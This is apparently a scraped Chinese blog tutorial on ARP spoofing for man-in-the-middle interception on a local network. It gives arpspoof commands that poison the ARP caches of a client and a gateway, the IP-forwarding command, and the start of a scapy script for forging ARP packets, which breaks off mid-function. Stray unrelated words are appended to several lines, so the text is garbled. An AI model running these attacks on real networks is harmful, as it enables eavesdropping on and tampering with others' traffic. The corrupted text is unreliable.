协议包分析python
ARP原理:缓存
在PC1 访问 Server 的流量 要通过网关 也就是 192.168.1.254blog
欺骗原理:pc1 与 网关 创建 MAC ARP 缓存ip
咱们将KALI 攻击机的 MAC 发给 pc 1 告诉 此时 ARP关系 与KALI 进行创建 import
arpspoof - i eth0 -t 192.168.1.254 192.168.1.1 把本身的MAC 发给 192.168.1.1 以网关的身份发过去 -- 192.168.1.254 - 192.168.1.1 这里会更改 用户的 MAC ARP缓存 原理
arpspoof - i eth0 -t 192.168.1.1 192.168.1.254 把本身的MAC 发给 192.168.1.254 以用户的身份发过去 告诉网关 咱们才是用户 -- 192.168.1.1 - 192.168.1.254 这里会更改 网关的MAC ARP缓存psr
这样 192.168.1.1 请求的 结果 就会返回给 KALI KALI 再发给 网关请求
网关获得的结果 发给客户端 也会返回KALI KALI 再发给客户端im
在kali 下操做 须要 echo 1 > /proc/sys/net/ipv4/ip_forward客户端
脚本编写:
利用python
scapy 模块
包:pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
import sys
import time
from scapy.all import *
def arp_spoof(ip1,ip2):
try:
pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
except: